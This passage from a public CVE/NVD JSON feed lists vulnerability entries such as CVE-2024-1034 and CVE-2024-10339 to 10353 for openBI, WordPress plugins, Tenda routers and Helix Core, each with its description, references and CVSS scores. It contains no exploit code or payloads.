"availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-24T18:15Z", "lastModifiedDate" : "2024-10-30T14:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10339", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-19T23:15Z", "lastModifiedDate" : "2025-02-19T23:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1034", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/ABYkFE4wRPW5", "name" : "https://note.zhaoj.in/share/ABYkFE4wRPW5", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252309", "name" : "https://vuldb.com/?ctiid.252309", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252309", "name" : "https://vuldb.com/?id.252309", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://note.zhaoj.in/share/ABYkFE4wRPW5", "name" : "https://note.zhaoj.in/share/ABYkFE4wRPW5", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?id.252309", "name" : "https://vuldb.com/?id.252309", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252309", "name" : "https://vuldb.com/?ctiid.252309", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadFile of the file /application/index/controller/File.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252309 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openbi_project:openbi:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-30T15:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10340", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a9d6c71-98ce-4fa7-817a-43e4f3dc0602?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a9d6c71-98ce-4fa7-817a-43e4f3dc0602?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/ultimate-shortcodes-creator/trunk/frontend/class-frontend.php?rev=2338595#L163", "name" : "https://plugins.trac.wordpress.org/browser/ultimate-shortcodes-creator/trunk/frontend/class-frontend.php?rev=2338595#L163", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3181163/ultimate-shortcodes-creator#file0", "name" : "https://plugins.trac.wordpress.org/changeset/3181163/ultimate-shortcodes-creator#file0", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'scu' shortcode in versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-05T02:15Z", "lastModifiedDate" : "2024-11-05T16:04Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10341", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/league-of-legends-shortcodes/trunk/lol-shortcodes.php?rev=934346#L101", "name" : "https://plugins.trac.wordpress.org/browser/league-of-legends-shortcodes/trunk/lol-shortcodes.php?rev=934346#L101", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/22ddafad-9214-4d32-9fc3-3f3c759633ad?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/22ddafad-9214-4d32-9fc3-3f3c759633ad?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The League of Legends Shortcodes plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 1.0.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tezzeract:league_of_legends_shortcodes:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-25T08:15Z", "lastModifiedDate" : "2024-11-05T17:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10342", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/league-of-legends-shortcodes/trunk/lol-shortcodes.php?rev=934346#L67", "name" : "https://plugins.trac.wordpress.org/browser/league-of-legends-shortcodes/trunk/lol-shortcodes.php?rev=934346#L67", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/45e96aa3-97bb-4774-a1b5-5f0a7b18293e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/45e96aa3-97bb-4774-a1b5-5f0a7b18293e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The League of Legends Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tezzeract:league_of_legends_shortcodes:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-25T08:15Z", "lastModifiedDate" : "2024-11-05T17:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10343", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4afc8de7-0d7e-4dee-972e-3eb707cd7b2b?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4afc8de7-0d7e-4dee-972e-3eb707cd7b2b?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/beek-widget-extention/trunk/inc/call-to-action.php?rev=1249743#L135", "name" : "https://plugins.trac.wordpress.org/browser/beek-widget-extention/trunk/inc/call-to-action.php?rev=1249743#L135", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Beek Widget Extention plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 0.9.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-25T09:15Z", "lastModifiedDate" : "2024-10-25T12:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10344", "ASSIGNER" : "security@perforce.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://portal.perforce.com/s/detail/a91PA000001SZOrYAO", "name" : "https://portal.perforce.com/s/detail/a91PA000001SZOrYAO", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Helix Core versions prior to 2024.2, an unauthenticated remote Denial of Service (DoS) via the refuse function was identified. Reported by Karol Wiesek." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-11T14:15Z", "lastModifiedDate" : "2024-11-21T08:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10345", "ASSIGNER" : "security@perforce.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://portal.perforce.com/s/detail/a91PA000001SZQTYA4", "name" : "https://portal.perforce.com/s/detail/a91PA000001SZQTYA4", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Helix Core versions prior to 2024.2, an unauthenticated remote Denial of Service (DoS) via the shutdown function was identified. Reported by Karol Wiesek." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-11T14:15Z", "lastModifiedDate" : "2024-11-21T08:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10347", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-11T02:15Z", "lastModifiedDate" : "2025-02-11T02:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10348", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/will121351/wenqin.webray.com.cn/blob/main/CVE-project/house-rental-management-system.md", "name" : "https://github.com/will121351/wenqin.webray.com.cn/blob/main/CVE-project/house-rental-management-system.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281697", "name" : "VDB-281697 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.281697", "name" : "VDB-281697 | SourceCodester Best House Rental Management System Manage Tenant Details index.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.427471", "name" : "Submit #427471 | https://www.sourcecodester.com/php/17375/best-courier-management house rental management system 1 Stored Cross-Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Best House Rental Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /index.php?page=tenants of the component Manage Tenant Details. The manipulation of the argument Last Name/First Name/Middle Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only shows the field \"Last Name\" to be affected. Other fields might be affected as well." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mayurik:best_house_rental_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-24T22:15Z", "lastModifiedDate" : "2024-10-30T13:03Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10349", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/will121351/wenqin.webray.com.cn/blob/main/CVE-project/house-rentalmanagement-system1.md", "name" : "https://github.com/will121351/wenqin.webray.com.cn/blob/main/CVE-project/house-rentalmanagement-system1.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281696", "name" : "VDB-281696 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.281696", "name" : "VDB-281696 | SourceCodester Best House Rental Management System ajax.php delete_tenant sql injection", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.427472", "name" : "Submit #427472 | https://www.sourcecodester.com/php/17375/best-courier-management house rental management system 1 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.sourcecodester.com/", "name" : "https://www.sourcecodester.com/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Best House Rental Management System 1.0 and classified as critical. Affected by this issue is the function delete_tenant of the file /ajax.php?action=delete_tenant. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mayurik:best_house_rental_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-24T22:15Z", "lastModifiedDate" : "2024-10-30T13:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1035", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/AIbnbytIW9Bq", "name" : "https://note.zhaoj.in/share/AIbnbytIW9Bq", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252310", "name" : "https://vuldb.com/?ctiid.252310", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252310", "name" : "https://vuldb.com/?id.252310", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://note.zhaoj.in/share/AIbnbytIW9Bq", "name" : "https://note.zhaoj.in/share/AIbnbytIW9Bq", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?id.252310", "name" : "https://vuldb.com/?id.252310", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252310", "name" : "https://vuldb.com/?ctiid.252310", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function uploadIcon of the file /application/index/controller/Icon.php. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252310 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openbi_project:openbi:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-30T16:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10350", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://code-projects.org/", "name" : "https://code-projects.org/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://github.com/RTio7/cve/issues/1", "name" : "https://github.com/RTio7/cve/issues/1", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281698", "name" : "VDB-281698 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281698", "name" : "VDB-281698 | code-projects Hospital Management System add-doctor.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427705", "name" : "Submit #427705 | code-projects Responsive Hotel Site Using PHP 1.0 sql", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Hospital Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/add-doctor.php. The manipulation of the argument docname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fabianros:hospital_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-24T23:15Z", "lastModifiedDate" : "2024-10-30T14:29Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10351", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://gitee.com/GXB0_0/iot-vul/blob/master/Tenda/RX9/20/setMacFilterCfg.md", "name" : "https://gitee.com/GXB0_0/iot-vul/blob/master/Tenda/RX9/20/setMacFilterCfg.md", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.281699", "name" : "VDB-281699 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281699", "name" : "VDB-281699 | Tenda RX9 Pro POST Request setMacFilterCfg sub_424CE0 stack-based overflow", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.427706", "name" : "Submit #427706 | Tenda Rx9 Router RX9 Pro Firmware V22.03.02.20 Stack-based Buffer Overflow", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.tenda.com.cn/", "name" : "https://www.tenda.com.cn/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda RX9 Pro 22.03.02.20. It has been rated as critical. This issue affects the function sub_424CE0 of the file /goform/setMacFilterCfg of the component POST Request Handler. The manipulation of the argument deviceList leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:rx9_pro_firmware:22.03.02.20:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:rx9_pro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-25T00:15Z", "lastModifiedDate" : "2024-11-01T16:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10352", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8aa2ba7f-c33d-4e80-b1cf-2d7b2a497f04?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8aa2ba7f-c33d-4e80-b1cf-2d7b2a497f04?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3182827/magical-addons-for-elementor", "name" : "https://plugins.trac.wordpress.org/changeset/3182827/magical-addons-for-elementor", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Magical Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.4 via the get_content_type function in includes/widgets/content-reveal.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpthemespace:magical_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.2.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-11-09T12:15Z", "lastModifiedDate" : "2025-01-29T19:10Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10353", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.281700", "name" : "VDB-281700 | SourceCodester Online Exam System admin-dashboard access control", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.281700", "name" : "VDB-281700 | CTI Indicators (IOB, IOC, 